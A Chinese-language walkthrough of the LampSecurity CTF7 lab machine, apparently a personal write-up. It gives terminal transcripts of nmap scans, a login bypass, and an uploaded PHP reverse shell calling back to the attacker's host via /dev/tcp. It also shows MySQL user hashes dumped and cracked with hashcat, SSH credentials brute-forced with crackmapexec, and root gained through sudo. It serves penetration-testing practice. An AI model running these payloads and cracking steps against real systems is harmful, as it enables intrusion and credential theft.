LAMPSECURITY: CTF7
https://www.vulnhub.com/entry/lampsecurity-ctf7,86/
扫描主机
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:24 CST
MAC Address: 00:50:56:E1:33:13 (VMware)
Nmap scan report for 192.168.54.136
Host is up (0.00027s latency).
扫描开放端口
─(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap --min-rate 10000 -p- 192.168.54.136 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:24 CST
Nmap scan report for 192.168.54.136
Host is up (0.0014s latency).
Not shown: 65507 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
TCP扫描
──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136 1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:26 CST
Nmap scan report for 192.168.54.136
Host is up (0.0016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds
UDP扫描
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sU -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:27 CST
Nmap scan report for 192.168.54.136
Host is up (0.00031s latency).
PORT STATE SERVICE
22/udp filtered ssh
80/udp filtered http
137/udp filtered netbios-ns
138/udp filtered netbios-dgm
139/udp filtered netbios-ssn
901/udp filtered smpnameres
5900/udp filtered rfb
8080/udp filtered http-alt
10000/udp filtered ndmp
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
脚本扫描端口
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:28 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.136
Host is up (0.00041s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /webmail/: Mail folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|_ /webalizer/: Potentially interesting folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-fileupload-exploiter:
| Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /login.php: Possible admin folder
| /phpmyadmin/: phpMyAdmin
| /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 115.57 seconds
8080端口发现login
尝试万能密码,成功。
在这里修改php代码,提交时发现暴露出路径。
那就尝试上传文件吧。先将反弹shell写入文件中,再上传。最后访问(这里别忘了监听)nc -lvnp 443
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>
得到shell
# yunki @ yunki in ~/vulnhub/ctf7 [9:42:02]
$ sudo nc -lvnp 443
[sudo] yunki 的密码:
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.136] 53367
bash: no job control in this shell
bash-4.1$
提权
bash-4.1$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:
不知道密码,难搞,去看看有哪些用户。没有发现啥有用的信息。去网站目录瞧瞧。
cd /var/www/html
bash-4.1$ ls -liah
ls -liah
total 3.7M
260010 drwxrwxr-x. 10 webdev webdev 4.0K Dec 24 2012 .
259983 drwxr-xr-x. 7 root root 4.0K Dec 19 2012 ..
260462 -rw-rw-r--. 1 webdev webdev 130 Dec 19 2012 .htaccess
260415 drwxrwxr-x. 2 apache webdev 4.0K Feb 26 03:25 assets
3302 drwxr-xr-x. 2 root root 4.0K Dec 24 2012 backups
260235 -rw-rw-r--. 1 webdev webdev 83K Dec 8 2012 bootstrap.zip
260392 drwxr-xr-x. 2 webdev webdev 4.0K Dec 8 2012 css
260420 -rw-rw-r--. 1 webdev webdev 189 Jul 26 2012 favicon.ico
260405 drwxr-xr-x. 2 webdev webdev 4.0K Dec 8 2012 img
260411 drwxrwxr-x. 2 webdev webdev 4.0K Dec 19 2012 inc
260352 -rw-rw-r--. 1 webdev webdev 568 Dec 24 2012 index.php
260408 drwxr-xr-x. 2 webdev webdev 4.0K Dec 11 2012 js
270634 -rw-r--r--. 1 webdev webdev 3.6M Nov 14 2012 roundcubemail-0.8.4.tar.gz
134349 drwxrwxr-x. 2 john john 4.0K Dec 19 2012 webalizer
259680 drwxr-xr-x. 11 webdev webdev 4.0K Dec 19 2012 webmail
阅读源码,发现在inc里有个db.php里有mysql用户和密码。
mysql试一试。
bash-4.1$ mysql -uroot -p
mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 107
Server version: 5.1.66 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| roundcube |
| website |
+--------------------+
4 rows in set (0.00 sec)
mysql> use website;
use website;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact |
| documents |
| hits |
| log |
| newsletter |
| payment |
| trainings |
| trainings_x_users |
| users |
+-------------------+
9 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username | password | is_admin | last_login | user_id | realname | profile |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 | 1 | 2012-12-19 11:30:54 | 3 | Brian Hershel | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 | 1 | NULL | 4 | John Durham | |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 | 1 | NULL | 5 | Alice Wonder | |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 | 1 | NULL | 6 | Ruby Spinster | |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a | 1 | NULL | 7 | Leon Parnetta | |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 | 1 | NULL | 8 | Julia Fields | |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 | 0 | NULL | 9 | Michael Saint | |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | 0 | NULL | 10 | Bruce Pottricks | |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 | 0 | NULL | 11 | Neil Felstein | |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf | 0 | NULL | 12 | Charles Adams | |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a | 0 | NULL | 36 | | |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 | 0 | NULL | 113 | | |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)
数据有些冗余,先处理一下。
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
# 放入a.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat a.txt | awk -F ' ' '{print $2}' | awk -F '@' '{print$1}' > usernames.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat usernames.txt
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat a.txt | awk -F ' ' '{print $4}' > hashes.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat hashes.txt
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
那就使用hash cat 破解吧
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
# 放入passwordRaw.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat passwordRaw.txt
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat passwordRaw.txt | awk -F ':' '{print $2}' > password.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat password.txt
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
密码爆破
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# crackmapexec ssh 192.168.54.136 -u usernames.txt -p password.txt --continue-on-success 2 ⨯
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
SSH 192.168.54.136 22 192.168.54.136 [*] SSH-2.0-OpenSSH_5.3
SSH 192.168.54.136 22 192.168.54.136 [-] brian:madrid Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:changeme Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:qwer1234 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:test Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:chuck33 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:turtles77 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:somepassword Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [+] brian:my2cents
...
skips
获得shell
# yunki @ yunki in ~/vulnhub/ctf7 [10:37:05]
$ ssh brian@192.168.54.136
The authenticity of host '192.168.54.136 (192.168.54.136)' can't be established.
RSA key fingerprint is SHA256:GfrI8RJ0/Xy8Za7qDP9Gm+RaoxuVz1GWo15hvn8+rdI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.136' (RSA) to the list of known hosts.
brian@192.168.54.136's password:
[brian@localhost ~]$
提权
# yunki @ yunki in ~/vulnhub/ctf7 [10:37:05]
$ ssh brian@192.168.54.136
The authenticity of host '192.168.54.136 (192.168.54.136)' can't be established.
RSA key fingerprint is SHA256:GfrI8RJ0/Xy8Za7qDP9Gm+RaoxuVz1GWo15hvn8+rdI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.136' (RSA) to the list of known hosts.
brian@192.168.54.136's password:
[brian@localhost ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for brian:
Matching Defaults entries for brian on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2
QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME
LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brian may run the following commands on this host:
(ALL) ALL
[brian@localhost ~]$ sudo /bin/bash
[root@localhost brian]# whoami
root
其他发现
在网站目录下的backups里发现了一个buckup.sql,其中有这样的敏感信息。
'brian@localhost.localdomain','d41d8cd98f00b204e9800998ecf8427e'
,还有其他用户的,这里先试试这个用户,因为刚才ssh登录就用的这个。无语 hashcat处理后居然是空的,哎,没啥用。